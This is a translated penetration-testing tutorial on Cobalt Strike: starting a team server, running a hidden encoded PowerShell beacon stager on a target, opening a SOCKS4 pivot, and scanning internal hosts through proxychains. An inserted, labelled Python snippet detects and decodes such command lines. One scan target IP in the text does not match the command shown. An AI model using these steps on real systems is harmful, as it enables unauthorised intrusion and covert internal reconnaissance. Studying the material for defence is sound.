Intranet Proxy Series (3): CobaltStrike Proxy


Notice: articles on this public account come from core team members and Knowledge Planet members; a small number are reposted with the original author's permission or from whitelisted public accounts. Reposting without permission is strictly forbidden! Do not use the techniques described in these articles for illegal testing; the authors and this public account bear no responsibility for any adverse consequences arising from doing so!






The attacking machine used here runs Kali Linux, and the tools involved are mainly proxychains and nmap. The attack topology is shown in the figure below.





01 Reverse Shell

First start the CobaltStrike team server with the following command:
>>> ./teamserver 192.168.43.137 xxxxxx
Then start the CobaltStrike client and fill in the IP address of the host running the team server, the port, a user name, and the password that was set on the server.




Once in the CobaltStrike client panel, click Attacks > Payload Generator to set up a listener and generate the payload.




Click Add, set the listener type and the listening port, and choose Powershell Command as the output format.




The generated payload, in PowerShell form, looks like this.




Run the copied payload on the target server host, as shown below:
powershell -nop -w hidden -encodedcommand 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




Once it has run, an interactive shell from the target host is received. Here you can run sleep 0 to set the beacon's check-in interval. Running shell whoami executes a remote command on the target host.
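From the defender's side, the one-liner shown above is exactly what appears in process-creation telemetry (Sysmon Event ID 1, Windows Security 4688). The following is an added example, not code from the article, that flags that flag combination in a command line and decodes the -EncodedCommand blob (base64 of UTF-16LE) so an analyst can read the script; the sample command lines are constructed and hypothetical.

```python
import base64
import re
from typing import Optional

# Flags seen in the Cobalt Strike one-liner above: -nop, -w hidden, -encodedcommand.
# PowerShell accepts unambiguous prefixes, so -enc / -ec / -e also mean -EncodedCommand.
FLAG_PATTERNS = {
    "noprofile": re.compile(r"(?i)(?:^|\s)-nop(?:rofile)?\b"),
    "hidden_window": re.compile(r"(?i)(?:^|\s)-w(?:indowstyle)?\s+hidden\b"),
    "encoded_command": re.compile(
        r"(?i)(?:^|\s)-e(?:ncodedcommand|nc|c)?\s+([A-Za-z0-9+/=]{16,})"
    ),
}


def decode_encoded_command(b64: str) -> Optional[str]:
    """-EncodedCommand carries base64 of the script in UTF-16LE; return the script or None."""
    try:
        return base64.b64decode(b64, validate=True).decode("utf-16le")
    except (ValueError, UnicodeDecodeError):
        return None


def analyse_cmdline(cmdline: str) -> dict:
    """Score one process command line and expose the decoded script for the analyst."""
    hits = [name for name, pat in FLAG_PATTERNS.items() if pat.search(cmdline)]
    match = FLAG_PATTERNS["encoded_command"].search(cmdline)
    decoded = decode_encoded_command(match.group(1)) if match else None
    # Two or more of these flags together is the shape of the generated payload;
    # a lone -enc is common in legitimate automation and is only surfaced, not flagged.
    return {"flags": hits, "decoded": decoded, "suspicious": len(hits) >= 2}


def make_encoded(script: str) -> str:
    """Encode a script the way PowerShell expects it (used here only to build sample data)."""
    return base64.b64encode(script.encode("utf-16le")).decode("ascii")


# Constructed sample command lines (hypothetical, not from the article's environment).
SAMPLE_CMDLINES = [
    "powershell -nop -w hidden -encodedcommand " + make_encoded("Write-Host 'constructed sample'"),
    "powershell.exe -File C:\\scripts\\backup.ps1",
    "powershell -enc " + make_encoded("Get-Process"),
]

if __name__ == "__main__":
    for line in SAMPLE_CMDLINES:
        print(analyse_cmdline(line))
```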





02 Adding a SOCKS4 Proxy

With a basic interactive shell in hand, right-click the beacon, choose Pivoting -> SOCKS Server, and set the port; the default port offered by the system here is 23612.




Install a proxy extension in Firefox and configure a SOCKS proxy; once configured, the web application on the internal host 192.168.237.129 can be reached. The relevant settings are shown below:





We can also use the proxychains tool for internal network reconnaissance: with an editor, add the socks4 proxy configuration as the last line of the file /etc/proxychains.conf.


[ProxyList]
# add proxy here
# ...
# meanwile
# defaults set to "tor"
socks4 127.0.0.1 23612


Then run nmap through proxychains to scan the ports of the internal host with IP address 192.168.237.127. The command is as follows:
>>> proxychains nmap -sT -Pn 192.168.237.129







Summary




Hope this is helpful to everyone.




This article first appeared on the WeChat public account 渗透Xiao白帽: 内网代理篇(三) CobaltStrike代理
